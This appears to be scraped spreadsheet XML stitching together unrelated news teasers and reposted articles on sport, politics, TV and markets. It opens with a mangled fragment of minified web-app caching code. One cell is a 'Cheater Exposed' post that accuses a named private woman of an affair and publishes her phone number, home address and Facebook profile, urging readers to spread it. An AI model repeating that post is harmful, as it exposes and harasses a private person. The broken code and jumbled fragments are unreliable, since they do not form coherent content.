10379),n,r,t[2],15,718787259),s,n,t[9],21,-343485551),e[0]=d(n,e[0]),e[1]=d(r,e[1]),e[2]=d(o,e[2]),e[3]=d(s,e[3])function o(e,t,n,r,o,a)return d((t=d(d(t,e),d(r,a)))&lt;2]=e.charCodeAt(t)+(e.charCodeAt(t+1)&lt;&lt;8)+(e.charCodeAt(t+2)&lt;&lt;16)+(e.charCodeAt(t+3)&lt;&lt;24);return nObject.defineProperty(n,"__esModule",value:!0);var f="0123456789abcdef".split("");function l(e)for(var t="",n=0;n&gt;8*n+4&amp;15]+f[e&gt;&gt;8*n&amp;15];return tfunction d(e,t)return e+t&amp;4294967295n.default=function(e)return function(e)for(var t=0;t2&amp;&amp;void 0!==arguments[2]?arguments[2]:”/”,r=arguments[3],a=(arguments.length&gt;4&amp;&amp;void 0!==arguments[4]?arguments[4]:).debug,u=e.request.url,f=function();a&amp;&amp;(f=function(e)console.log(“[TM PWA] “+e));for(var l=u.match(///.+?//)[0].includes(t),d=l&amp;&amp;!u.includes(“service-worker.js”),g=0,h=s.length;!d&amp;&amp;g2&amp;&amp;void 0!==arguments[2]?arguments[2]:”readonly”;return new Promise(function(o,a)var i=e.open(“marwood-pwa”,1);i.onupgradeneeded=function()r.forEach(function(e)i.result.objectStoreNames.contains(e.name)),i.onsuccess=function()if(i.result.onversionchange=function(e)===e.newVersion&amp;&amp;e.target.close(),i&amp;&amp;i.result&amp;&amp;i.result.objectStoreNames.contains(t))var e=i.result.transaction(t,n).objectStore(t);if(e)return void o(e)a()),],7:[function(e,t,n)”use strict”;Object.defineProperty(n,”__esModule”,value:!0);var r=”marwood-af05a279f9537a620349bcf36d4180b4″,o=”offline/”;function a(e)caches.open(r).then(function(t)document.querySelectorAll(‘meta[name=”cache-preload”]’).forEach(function(e)var n=e.getAttribute(“content”);t.match(n).then(function(e)));var n=e+o;t.match(n).then(function(e)fetch(n).then(function(e)if(e.redirected)var r=e.clone(),o=status:r.status,statusText:r.statusText,headers:;e.headers.forEach(function(e,t)o.headers[t]=e),r.text().then(function(e)t.put(n,new Response(e,o)))else t.put(n,e))))n.default=function(),],8:[function(e,t,n)”use strict”;Object.defineProperty(n,”__esModule”,value:!0),n.track=function(e,t)(0,a.default)(e,i,”readwrite”).then(function(e)e.put(url:t,timestamp:(new Date).getTime())),n.offlineLandingTracking=function()var e=localStorage.getItem(c);return localStorage.removeItem(c),e,n.trackOfflineLanding=function();var r,o=e(6),a=(r=o)&amp;&amp;r.__esModule?r:default:r;var i=”pageviews”,c=”offlineLandingPageViews”;n.default=function(e,t)(0,a.default)(e,i,”readwrite”).then(function(e)var n=e.count();n.onsuccess=function()var r=n.result-1;r&gt;0&amp;&amp;t(r),e.clear()),6:6],9:[function(e,t,n)”use strict”;Object.defineProperty(n,”__esModule”,value:!0),n.MANIFEST_CACHE_NAME=n.validate=n.urlBase64ToUint8Array=n.cookie=n.getManifest=n.analytics=void 0,n.stub=function(e)var t=analytics:g,getManifest:v;return n.analytics=g=e.stub(),n.getManifest=v=e.stub(),analytics:g,getManifest:v,restore:function()n.analytics=g=t.analytics,n.getManifest=v=t.getManifest;var r=e(8),o=f(r),a=f(e(4)),i=f(e(1)),c=f(e(7)),u=f(e(5)),s=e(10);function f(e)return e&amp;&amp;e.__esModule?e:default:evar l=navigator.userAgent.match(/iPhone,1:1,10:10,4:4,5:5,7:7,8:8],10:[function(e,t,n)”use strict”;Object.defineProperty(n,”__esModule”,value:!0);var r=/(.*/amp/.*,],,[3]); //# sourceMappingURL=pwa.min.js.map #mc_embed_signupbackground:#fff; clear:left; font:14px Helvetica,Arial,sans-serif; /* Add your own Mailchimp form style overrides in your site stylesheet or in this style block. We recommend moving this block and the preceding CSS link to the HEAD of your HTML file. */ The post Gemma Collins’ weight loss jabs – the risks of the hunger fighting injections revealed – Laskafitness appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Matthew Knott</t>
  </si>
  <si>
    <t>As the three-hour debate dragged on, so did Joe Biden's answers, which became increasingly rambling and at times borderline incoherent.</t>
  </si>
  <si>
    <t>Andrew Wu</t>
  </si>
  <si>
    <t>All-rounder Mitchell Marsh has been recalled for a game Australia cannot lose if they are to secure their first series victory in England in 18 years.</t>
  </si>
  <si>
    <t>Cheater Exposed</t>
  </si>
  <si>
    <t>She is someone who doesn’t have any values or morals. She had an affair with a guy who is married for 17 years. She ruined a family and still had the audacity to act like she is the rightful person. She even said she doesn’t deserve to be kept in the shadows – let’s help her be on the spotlight. Pass along.REGGIE F. LIMQUIACOaka JHENG JHENG+639952257565Zone 1, Taboc, Opol, Misamis Orientalhttps://www.facebook.com/JhengHeartfilia The post Homewrecker Alert: Reggie F. Limquiaco aka Jheng Jheng appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Chloe Chomicki</t>
  </si>
  <si>
    <t>Time has run out for the owners of 14 holiday shacks near Ingham in north Queensland with the State Government ordering their removal by the end of the month.</t>
  </si>
  <si>
    <t>SuperSonics legend Jack Sikma urges NBA return to Seattle during Hall of Fame induction Original Source Jack Sikma was the heart of the Seattle Supersonics, helping lead that team to an NBA title in 1979. His play as a seven-time All-Star (and the only center in NBA history to lead the league in single-season free throw percentage at .922 in 1988) has taken him all the way to Springfield and the Naismith Basketball Hall of Fame. Sikma used that platform this weekend in part to plead for a return of the NBA to Seattle. “To all the diehard Sonic fans who proudly sport the green and gold… there’s a hole in Seattle that needs to be filled. Speaking for all Sonics fans, it’s our great hope that the NBA will soon find a pathway to bring a franchise back to Seattle. It’s time.” It was a huge applause line. The Sonics were sold by Howard Shultz (the man who gave us Starbucks) to Clay Bennett and a team of investors from Oklahoma, who leveraged an arena conflict with the city of Seattle to move the team to Oklahoma City in the fall of 2008. While there has been talk the past decade of franchises moving to Seattle — the Kings came closest before the team was sold to Vivek Ranadive, who built a new arena and kept everything in Sacramento — nothing has come of it. While the people of Seattle (and other cities) have called for NBA expansion, the league’s owners have shown no interest in that (and I was told by sources in the past year it was not on the table for the league right now). That said, if there is a team sold and on the move in the coming years, there is a feeling around the league that Seattle and its backers should get first crack at it. Currently, that is not on the table. Congratulations to Skima for deservedly making the Hall of Fame, and using the platform he was given so well.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SuperSonics legend Jack Sikma urges NBA return to Seattle during Hall of Fame induction appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>GSJohn</t>
  </si>
  <si>
    <t>Cheaper than the last time this deal was posted. Maybe the Lowest. Don't forget Cashrewards/shopback.</t>
  </si>
  <si>
    <t>The presenter caused chaos on social media after he accidentally got the time in the morning wrong. Panicked viewers were concerned they were actually an hour behind after Dan told the audience what time it was. One wrote on social media wrote on Twitter: “Dan Walker frightened the life out of me saying it was 7.24!!! It comes after Dan left Louise speechless as he admitted to the one thing he wanted to happen to him if he was in a James Bond film. He said: “I’d like to be the person who has to jump out of the way of a car.” A little perplexed, Louise replied: “Would you? I’m sure they’ve got space for you, Dan.” But Dan wasn’t finished, as he then confessed: “I’ve always wanted to be shot in a film.” Louise was utterly stunned, as Dan continued: “I don’t know why. “I’d love to be shot – just get shot really early in the film.” Dan first took his place on the BBC Breakfast sofa as one of the main presenters after Bill Turnbull, 63, announced he was leaving following 15 years on the show. His BBC Breakfast co-host is Louise Minchin. In a recent interview with The Daily Mirror, Dan and Louise spoke out about their friendship. Louise has claimed that they regularly help each other out of tight spots on air. She said: “I think we’re both team players. “And so many times Dan gets me out of trouble or I get him out of trouble.” BBC Breakfast airs weekdays at 6am on BBC One. Source link</t>
  </si>
  <si>
    <t>POWER season 6 episode 4 now has a promo that sees Ghost being chased by an unknown attacker. Here’s what will happen in Why is Tommy Still Alive on Starz and Netflix. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Michael Lynch</t>
  </si>
  <si>
    <t>English import Craig Noone starred as Melbourne City cruised through to the last four of the FFA Cup after a convincing 3-0 quarter final win over Western Sydney Wanderers</t>
  </si>
  <si>
    <t>The Gaffa</t>
  </si>
  <si>
    <t>Bradford City Welcome Northampton Town to Utilita Energy Stadium BRADFORD, ENGLAND – MARCH 26: A general view of the stadium prior to kick off in the Sky Bet League One match between Bradford City AFC and Millwall FC at Coral Windows Stadium on March 26, 2016 in Bradford, United Kingdom. (Photo by Daniel L Smith/Getty Images) Bradford City vs Northampton Town takes place in the seventh match week of League Two and with just one point separating them, it should be a tightly contested game. Both teams have been slow out of the blocks but with Bradford aiming for automatic promotion, the pressure for points is building. Bradford City Welcome Northampton Town Northampton Town Team News The Cobblers were beaten 2-0 at home to Peterborough United in the Leasing.com Trophy on Tuesday night and will look back to the league in hope of a victory. Manager Keith Curle saw positives in the defeat against the Posh and wants his side to be more ruthless in the final third. Northampton have plenty of height and experience in their ranks to cause Bradford’s defence some problems. Curle’s side added defender Michael Harriman, 26, to their ranks yesterday. The free-agent signed days after Joe Bunney left the club to sign for Bolton Wanderers. Harriman should be ready to start after already training with the club over the past weeks. Ryan Watson broke his collar bone in Tuesday’s defeat and will be out for the foreseeable future. Charlie Goode and Jordan Turnbull have returned to training and might be available for Saturday’s game. Forward Matt Warburton will undergo fitness testing after returning from an ankle injury. Bradford City Team News Bradford’s start to the season has been a mixed bag and fans are demanding a dominant performance this Saturday from the Bantams. Gary Bowyer has taken a lot of flack from supporters with many believing his formation tinkering is causing harm to what could be a strong squad. Bradford’s Tuesday night game, against the newly-saved Bolton Wanderers, was almost a highly embarrassing affair. Bolton’s squad had an average age of 19 and gave a good fight against a strong Bradford team. However, the Bantams were unlucky in front of goal. Jordan Gibson hit the post in a situation that should have been an easy finish. Harry Pritchard and Paudie O’Connor also went close to scoring for them. Bowyer will reinstate his strongest line-up against the Cobblers. James Vaughan will be leading the line, with new recruits Aramide Oteh and Dylan Connelly pushing for a start. Jamie Devitt will be sidelined due to a hamstring injury picked up against Wanderers on Tuesday. Bradford City vs Northampton should be a tightly contested affair and but bookies still place Bradford as favourites to win. Although, their stuttering form means Northampton could very easily cause an upset. Referee Leigh Doughty will be in charge of the contest. Doughty has overseen three league games this season, showing four yellow cards. This post Bradford City Welcome Northampton Town to Utilita Energy Stadium appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>After seeing the first signs of what Jack Hughes could be for the Devils, Taylor Hall should be more willing to sign an extension withe New Jersey. Source: Sports Business News</t>
  </si>
  <si>
    <t>Visitors to a popular Queensland island have been urged not to feed dingoes -- no matter how hungry they look.</t>
  </si>
  <si>
    <t>Thousands of pro-democracy advocates took to Sydney's streets yelling "stand with Hong Kong".</t>
  </si>
  <si>
    <t>1.10 And 1.30 Anticipated As The Imminent Targets For GBP/USD Original Source Michael Harris September 28, 2019 2 min read The avid traders of “Cable (GBP/USD) pair from around the globe have been keenly following the events of Brexit since the second quarter of 2017. Owing to its gravity, it is given to have a strong impact on the value of Pound Sterling in the global forex market. As such, political affairs circling Brexit have surely been the primary market mover for GBP/USD for the past several months. Brexit Deal – What Does It Potentially Mean For The Forex Traders? As per the Financial experts, a Brexit deal with the European Union (EU) that equally satisfies both the parties about an aggravated issue regarding Ireland is being pushed farther from reality with time. The talk of “Cable” dropping to 1.10 level in an event of a no-deal Brexit has been hot in the world of foreign exchange. However, perhaps due to the increasingly slimming chances of the UK government to find a pragmatic solution that revitalizes the hopes of a deal with the EU, analysts have been reluctant in discussing the other side of the coin. How may the forex market respond in an event of a deal? Analysts’ View Of The Post Brexit Deal Market Movement As per the Rabobank Analysts, the political and economic scenario revolving Brexit is likely to cast the strongest impacts on GBP/USD and EUR/GBP pairs. While the former currently trades around 1.23 level, it is being anticipated that a fall to 1.10 level in an event of no-deal is imminent. However, if a deal is struck between the European Union and the government of the UK in an unlikely turn of events, a rise to 1.30 level is in sight on the up side, as per the analysts. September has been a busy month for the parliament in terms of addressing the affairs concerning Brexit. In light of such events, there is a general consensus among the experts about the likelihood of a further delay (beyond October 31st) for the start of Brexit to January 31st. If it is further pushed forward, the EUR/GBP pair is being predicted to trade around 0.9 level for a period of three months until the Brexit deadline approaches. Provided that a deal is signed between the EU and the UK government, the pair is expected to fall and settle around 0.85 level again. Brexit events have surely been quite a see-saw for GBP/USD and EUR/GBP pairs for several months. Until the deadline strikes and a deal or no-deal is finalized, it looks like these pairs will continue taking the avid traders on for an adventurous ride. Rate this post Total: 0 Average: 0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1.10 And 1.30 Anticipated As The Imminent Targets For GBP/USD appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Simon Smale</t>
  </si>
  <si>
    <t>Rafael Nadal claimed his fourth US Open crown and 19th grand slam singles title overall after a mammoth four-and-three-quarter-hour, five-set victory over Daniil Medvedev.</t>
  </si>
  <si>
    <t>It wasn't in a doctors office or a hospital that Gabrielle Jackson learnt for the first time that her long list of painful symptoms were all typical of endometriosis.</t>
  </si>
  <si>
    <t>The approach requires the Fed to hang on to large holdings of government-backed bonds to keep reserves, essentially currency deposits at the Fed, plentiful. Central bankers had thought that they had a long way to go before reserves became scarce. So until last month, they were shrinking their balance sheet and drawing down that supply. But Mr. Williams said the recent episode showed him that the approach might require higher reserves than he had realized. That is important, because it could hint that the Fed will start growing its balance sheet again soon, something several of Mr. Williams colleagues have signaled over the past week. Mr. Williams, who has a constant vote on monetary policy decisions made by the Federal Open Market Committee, was mum on the other major question facing policymakers — whether the Fed will cut rates beyond the two moves it has already made. He declined to give any hint about his preferences, arguing that amid uncertainty, the Fed should keep its options open. Here is a look at how he is addressing the biggest questions facing the New York Fed and the central bank, in a curated, and partly paraphrased, transcript. New York Times: Some market participants have said the Fed was too slow to intervene amid the recent disruption in overnight repurchase agreements, or repos. Can you walk us through the decision-making process? Mr. Williams emphasized that data on the Fed’s policy rate, the federal fund rate, comes in slowly and the official figure is released on a delay — it comes out at 9 a.m. the following morning. That figured into the timing, Mr. Williams said, because “we need to explain why we’re intervening — the desk directive is very clear,” he said, referring to the rules set out by the policymaking Fed committee for the New York Fed to follow. The bank is meant “to conduct open market operations, to keep the federal funds rate in the range.” He noted that the Fed took market participant feedback from the first intervention into account. Since Sept. 17, it has announced a day in advance that it would provide liquidity to markets and how much. It also -announced on Sept. 20 that it would continue intervening through Oct. 10. Source link</t>
  </si>
  <si>
    <t>Jordan Baker</t>
  </si>
  <si>
    <t>A volunteer ethics teacher has been stood down for saying the Stolen Generations were the result of bad parenting rather than government policy.</t>
  </si>
  <si>
    <t>More than two million people were planning to attend today’s “storming” of super-secret US military base Area 51 — but when crunch time came, something surprising happened.</t>
  </si>
  <si>
    <t>A leading meningitis charity is calling for better support for survivors of the disease. Read more? Click here</t>
  </si>
  <si>
    <t>Adrian Proszenko</t>
  </si>
  <si>
    <t>Coach Brad Arthur is among the Eels identities backing governance reform of the Parramatta Leagues Club.</t>
  </si>
  <si>
    <t>At least 19 people have been killed and 300 wounded after a shallow earthquake rattled northeastern Pakistan, a senior police officer said, with the tremor tearing car-sized cracks into roads and heavily damaging infrastructure.</t>
  </si>
  <si>
    <t>CLAUDIA WINKLEMAN, 47, is one half of the presenting duo that appear on Strictly Come Dancing each week. She and Tess Daly are at the helm of the hugely popular show. Look inside the TV star’s home with her husband Kris Thykier. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Marc Cherry provided a character statement for Felicity Huffman as part of her ongoing court case. See full article at Film-news.co.uk » The post Felicity Huffman felt like 'ugliest one' on Desperate Housewives set appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Report: Top 20 Consolidated 7 Programs Channels: All Free-to-Air Market: 5 City Metro (aggregate figure) Demographics: Total People Day-part: 02:00 – 26:00 Day: Saturday Date: 07/09/2019 Deliverable: Consolidated 7 v Overnight Rank Description (grouped) Channel\Network Consolidated 7 Overnight Increase 000s 1 SEVEN NEWS – SAT Seven Network 840,000 838,000 2,000 2 SEVEN’S AFL: SATURDAY NIGHT FOOTBALL FINALS Seven Network 774,000 766,000 8,000 3 NINE NEWS SATURDAY Nine 737,000 736,000 1,000 4 ABC NEWS-SA ABC 570,000 569,000 2,000 5 SEVEN’S AFL: SATURDAY AFTERNOON FOOTBALL FINALS Seven Network 553,000 552,000 1,000 6 SEVEN’S AFL: SATURDAY NIGHT FOOTBALL FINALS – PRE MATCH Seven Network 461,000 461,000 0 7 THE MID-YEAR ASHES: FOURTH TEST -ENG V AUS -SESSION 1 -D4 Nine 404,000 403,000 1,000 8 THE MID-YEAR ASHES: FOURTH TEST -ENG V AUS -SESSION 2 -D4 Nine 349,000 345,000 4,000 9 POLDARK-EV ABC 337,000 243,000 94,000 10 THE MID-YEAR ASHES: FOURTH TEST -ENG V AUS -LUNCH -D4 Nine 331,000 330,000 0 11 DEEP WATER-EV ABC 300,000 266,000 35,000 12 SEVEN’S AFL: SATURDAY AFTERNOON FOOTBALL FINALS – PRE MATCH Seven Network 287,000 287,000 0 13 WEEKEND SUNRISE – SAT Seven Network 285,000 285,000 0 14 GETAWAY Nine 271,000 263,000 8,000 15 THE MID-YEAR ASHES: FOURTH TEST -ENG V AUS -SESSION 1 -D4 9Gem 270,000 270,000 0 16 SEVEN’S AFL: SATURDAY NIGHT FOOTBALL FINALS – POST MATCH Seven Network 251,000 250,000 1,000 17 WEEKEND SUNRISE – SAT – LATE Seven Network 249,000 249,000 0 18 WEEKEND SUNRISE – SAT – EARLY Seven Network 231,000 231,000 0 19 WEEKEND TODAY – SATURDAY Nine 228,000 228,000 0 20 M- GREASE Seven Network 217,000 215,000 2,000 © OzTAM Pty Limited 2019. The Data may not be reproduced, published or communicated (electronically or in hard copy) without the prior written consent of OzTAM.</t>
  </si>
  <si>
    <t>Description Location: Newmarket, ONMorning shift:7 am 4:30 pm (Mon-Fri)Payrate: $15/hrStart Date-ImmediateIf interested then please call immediately at +1 647-696-6728DUTIES:Order picking different warehouse scaffoldsUsing hand or power tools to service different products.HEAVY LIFTING up to 50 LbsMust be fast paced, fluent in English, follow directions and a team playerAccurate with counting and stack racks of scaffold .. Read more</t>
  </si>
  <si>
    <t>I love Weird Al. [The YouTube] Do you have something you’d like to share? A link? A joke? Some words of wisdom? A topic to discuss? It’s Friday Night Open Thread. What’s on your mind? 0 0</t>
  </si>
  <si>
    <t>Korean Street Food – GIANT EEL Sashimi Hotpot Busan Seafood Korea The post Korean Street Food – GIANT EEL Sashimi Hotpot Busan Seafood Korea appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Chinese Latvian Dictionary – travel dictionary to translate Chinese to Latvian. Click on the list to show Chinese or Latvian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Chinese Latvian Dictionary →</t>
  </si>
  <si>
    <t>gregdalgetty</t>
  </si>
  <si>
    <t>StatsCan says the market value of Canadian pensions hit $1.97 trillion The post Canadian pension assets rose by 5% in Q1 appeared first on Advisor.</t>
  </si>
  <si>
    <t>Bridget McManus</t>
  </si>
  <si>
    <t>In Backtrack Boys, youth worker Bernie Shakeshaft helps kids who have hit rock bottom by training them to work with cattle dogs.</t>
  </si>
  <si>
    <t>Pat Murphy</t>
  </si>
  <si>
    <t>When Bonanza made its debut on Saturday, Sept. 12, 1959, it was joining a TV schedule littered with series westerns. During that 1959-60 season, over 30 westerns regularly stalked North American home screens. And most of them were on network evening TV, thus occupying plum spots during peak viewing hours. ABC’s 1959-60 Sunday night roster featured no fewer than five westerns. Like any genre, the western had its tropes and limitations. But that didn’t mean that all shows were identical. Some drew inspiration from real historical personalities like Bat Masterson and Wyatt Earp. Of course, inspiration wasn’t to be confused with a strict adherence to facts. That would never do. There were also shows with a strong element of humour. Maverick is perhaps the best example. And sometimes, such as with Joel McCrea in Wichita Town, a show was a last hurrah for an aging movie star. Other times, it was a springboard for what became a major film career. Think Steve McQueen in Wanted: Dead or Alive and Clint Eastwood in Rawhide. Two shows stood out – Gunsmoke and Bonanza. While they weren’t the only westerns to generate large audiences, their longevity and sustained popularity put them in a class apart. Gunsmoke began as a radio series in 1952 and ran in that medium until 1961. Set in Dodge City, Kansas, it was deliberately created for an adult audience and revelled in a bleak, unsparing depiction of the Old West. Gunsmoke’s creator, John Meston, conceived of a leading man without the altruistic heroism associated with other cowboy figures. Matt Dillon was to be “almost as scarred as the homicidal psychopaths who drifted into Dodge from all directions.” And the main female role – Miss Kitty – was a prostitute, although the details of her occupation were laid between the lines rather than explicitly spelled out. But the observant and worldly-wise weren’t fooled. As a Time magazine feature put it, she was “obviously not selling chocolate bars.” None of the main radio actors participated in the TV adaptation. Instead, the network opted to recast. TV, after all, was a visual medium and physical appearance was deemed to matter. Gunsmoke made its TV debut on Sept. 10, 1955, ran for 20 seasons and racked up 635 episodes. For several of those years, it was the most popular show on air. When it was cancelled in 1975, it was still in the top 30. Bonanza, in contrast, was conceived entirely for television. Set in 1860s Nevada, it portrayed the Cartwright family, which consisted of a father and three sons living on a vast ranch called the Ponderosa. Ben Cartwright, the patriarch played by Canadian Lorne Greene, was thrice-widowed, each marriage having produced one of the sons. Female characters came and went but there were no permanent attachments. Nor was there a Bonanza equivalent of Miss Kitty. The major interactions were male-oriented and familial. Insofar as the term would have been understood at the time, Bonanza had a moderately liberal tinge. But being a network show aimed at a mass audience, it operated within definite boundaries. Corporate sponsors instinctively disliked controversy and tended to shy away from themes that might alienate some part of the customer base. Still, and however gingerly, Bonanza did feature story lines incorporating issues like domestic violence, substance abuse, bigotry and the environment. It didn’t polarize or preach, but it did nudge. Two of the four main characters – the patriarch and the youngest son – stayed with the show for its entire 14 seasons. The oldest son was written out after six years because the actor playing the part was unhappy with aspects of his character and the gruelling schedule of 34 episodes per season. And the middle son, portrayed by Dan Blocker, departed when Blocker unexpectedly died following a 1972 gall bladder operation. Bonanza wasn’t initially a huge hit. However, when it was switched to the Sunday 9 p.m. slot for the 1961-62 season, it took off. By 1964, it was television’s top show and it remained in the top 10 until 1971. From the vantage point of 2019, it’s difficult to imagine a TV world like that into which Bonanza debuted 60 years ago. The English novelist L.P. Hartley got it right: “The past is a foreign country: they do things differently there.” Troy Media columnist Pat Murphy casts a history buff’s eye at the goings-on in our world. Never cynical – well, perhaps just a little bit. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post When TV westerns ruled the roost appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>OPINION The Daily Telegraph published a story on Tuesday claiming that Newcastle United striker Andy Carroll won’t be fully fit to start a game for the Magpies until after Christmas, or at least that’s what the club’s medical staff suspect. That’s not good news for the Toon Army, and the supporters are clearly not happy. However, is this really that big a deal? Source</t>
  </si>
  <si>
    <t>Benjamin Butterworth</t>
  </si>
  <si>
    <t>An 11-year-old girl has scared off an armed robber by throwing bread at him. The masked robber had pulled out a knife in a supermarket in Sussex, but left empty-handed after being hit by the loaf and some bottles of squash. Officers praised the daughter and her father’s bravery, but said they still need to track down the suspect. Sussex Police said a man walked into an Express Supermarket in Worthing just before 10pm on Monday and demanded that staff empty the till. Bread and squash An 11-year-old girl scared off the armed robber by throwing bread at him (Photo: PA) But the man got more than he bargained for when the girl and her father, who had been shopping at the time, spotted him and took action. In a dramatic encounter captured on the shop’s CCTV, the pair threw two bottles of squash and a loaf of bread at him. After one last unsuccessful attempt to grab money from the till, the raider fled empty-handed out of the shop. Nobody was harmed during the incident, police confirmed. Bravery praised Detective Constable Noel Simmonds said: “I cannot praise enough the bravery of the father and daughter who intervened in this knifepoint attempted robbery. Read More: Knife crime campaigners return chicken boxes to Home Office with suggestions written inside “There are considerable risks any time a knife is used or brandished, and whilst it is tempting to just view the spectacle of an armed robber fleeing in panic from a young girl, if the suspect is not caught he may try again, and next time someone could be seriously hurt. “We need to identify the suspect as quickly as possible so we are asking people to view the CCTV footage and stills and to please get in touch with us if you know who did this is or have any information about the incident.” The suspect is white, slim, about 5ft 8in and was wearing a green Nike hooded jacket with the hood up, a black baseball cap, blue jeans and green Adidas POD trainers, police said. He had a scarf covering his face and was also wearing gloves. Additional reporting by Press Association More news Major warns Government victory in Supreme Court could kill democracy Exclusive: Students taking on extra debt to 'trade up' to better unis Why Apple is fighting a €13bn tax bill in Ireland Households 'buying fewer groceries' despite talk of Brexit stockpiling Gym-mad man, 23, who 'barely drank' in coma after drunken balcony fall Caroline Lucas says Lib Dem plan to revoke Article 50 is 'dangerous' The post Girl, 11, scares off knife-wielding supermarket thief by throwing a loaf of bread at him appeared first on inews.co.uk. The post Girl, 11, scares off knife-wielding supermarket thief by throwing a loaf of bread at him appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Mark Drakeford: “Even the best form of Brexit is not as good as Remain” Original Source “Even the best form of Brexit is not as good as Remain,” Mark Drakeford told LabourList in an interview in Brighton on Sunday. He had just confirmed in his conference speech that his Welsh Labour government would campaign “wholeheartedly, vigorously and unapologetically, for Wales to remain in the EU”. This stands in contrast to the position held by the UK Labour leadership, which is battling at this year’s conference to convince those with voting rights that the party should not commit to a Remain position in a fresh referendum before the next election. Welsh Labour hit the headlines last week when its leader contacted party members to confirm his Remain stance and say that “any type of Brexit… will cause potentially irreparable damage”. This email went out the day after it was decided by Labour’s national executive committee (NEC) that trigger ballots in Wales would not be devolved – despite control of selection processes (rather than reselection) already being assigned to Welsh Labour. Explaining his devolved Brexit position, Drakeford said the idea for Labour’s alternative deal was “always… a damage-limitation exercise” and pointed to “contributors who are asking themselves whether the United Kingdom is somewhere where they can see a future for themselves”. Highlighting barriers to trade as well as the impact on migrants who have “settled into Welsh communities”, he remarked: “At the other side of Brexit, however soft it may be, those questions will still be there. So if you’ve got a choice, even the best form of Brexit is not as good as remain. And that’s why we will advocate and campaign to remain.” Scottish Labour and Welsh Labour have both confirmed that they will be backing Remain in a fresh referendum, and yet Jeremy Corbyn is fighting at this conference to keep Labour’s Brexit manifesto pledge limited. The UK line is that Labour will hold a public vote, and let the people decide. According to that plan, the question of how it would campaign in that vote would be left unanswered at the next election. Three parties, two different messages on the key issue of the day. Is that viable? “20 years into devolution, I don’t think that’s difficult,” Drakeford said. “People in Wales are very used to things being different. We’ve been discussing today, free prescriptions; we’ve had are free prescriptions in Wales since we won an election in 2003. So that’s over 15 years ago. People are absolutely used to the idea that, on many things, the way we do things in Wales is very different from how we do things in other parts of the United Kingdom. “The fact that we will have this nuance of difference – I don’t think it should be exaggerated, we are 100% behind the UK position of having another referendum, and that’s what the general election will be about. If we don’t win, we can’t secure it. So let’s make sure we win.” Some Labour members may be wondering whether Drakeford is still a Corbynite, which is how he was described during the Welsh leadership election in 2018. On this query, he replied: “I knew, once Jeremy Corbyn stood for election, that I would be voting for him in that first leadership election, as I voted for Diane Abbott in the election beforehand. I thought what I was doing was sending a message to the Labour Party about the importance of that strand of opinion within our party.” He hasn’t embraced the label ‘Corbynite’ as such, but is still happy to have backed Jeremy Corbyn in 2015. “I thought I was just sending a message to whoever won that that strand in our party was not to be neglected. The rest, as they say, is history, because you know when I first decided and I knew as soon as he we would stand that I’d be voting for him, it wasn’t at that moment in the expectation that he was going to win. Years later I’m very glad that I made that decision and I’d make it again.” Even on the matter of NEC members refusing to back devolution of reselection processes, Drakeford did not complain in his interview with LabourList. That is despite Scottish Labour having full control over both its selections and reselections. The Welsh Labour leader didn’t appear to lay much blame on opposing NEC members for the vote result earlier this week, putting the decision down to a packed agenda and a broader lack of awareness about the situation. “Well my belief of it is, in the end, we simply didn’t have the time that we needed to explain to people what it was we were asking,” he told LabourList. “If we know the NEC has an agenda from here to the wall with all sorts of things that go very quickly through, and I don’t want to make this sound like I’m being critical of anybody, but I doubt that an obscure part fo the rulebook affecting not just selection but a niche part of the selection process, in one part of the country, had necessarily grabbed the full attention of everyone around the table. “And we think the wrong decision was made but we think it’s more a matter of finding another opportunity to explain why, if you’ve got selection of MPs, selection and reselection of Assembly Members – and you always had reselection of MPs until a year ago – it simply makes sense. The rulebook is incomplete and untidy and doesn’t make sense for Welsh members without having the full set of things. We’ll just need to work harder to get people to understand why that’s the right thing.” Drakeford admitted that internal party devolution “shouldn’t depend upon the chance of having the right people who’ve got an interest”, and said there needs to be “mechanisms in place”. But his perspective on the row was still largely cheery. Drakeford summed up his view as such: “You know in politics, in my long experience, mix-up is always likely to be the real explanation you know, rather than deliberate malign intent.” Value our free and unique service? LabourList has more readers than ever before – but we need your support. Our dedicated coverage of Labour’s policies and personalities, internal debates, selections and elections relies on donations from our readers. Support LabourList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Mark Drakeford: “Even the best form of Brexit is not as good as Remain” appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Tom Decent</t>
  </si>
  <si>
    <t>World Cup-winning All Blacks coach Graham Henry had some choice insights into the defending champions before their blockbuster World Cup opener on Saturday.</t>
  </si>
  <si>
    <t>Summer breaks are often blighted by corporate ineptitude. Here’s what can go wrong – and how to seek redressThis month thousands of holidaymakers will have returned home … in need of a rest. My inbox echoes with cries from those whose summer breaks have been blighted by corporate ineptitude. If you were lucky enough, at least, to have become airborne – not stranded by a pilots’ strike – you could well have arrived without your belongings. Then there’s the car rental desk where you found a reservation cancelled without a refund because your flight was delayed, or the discovery, when you finally got to the accommodation, of a desiccated hole where the swimming pool should have been. Here are the five most common problems and what can be done to seek redress: Continue reading… Read More</t>
  </si>
  <si>
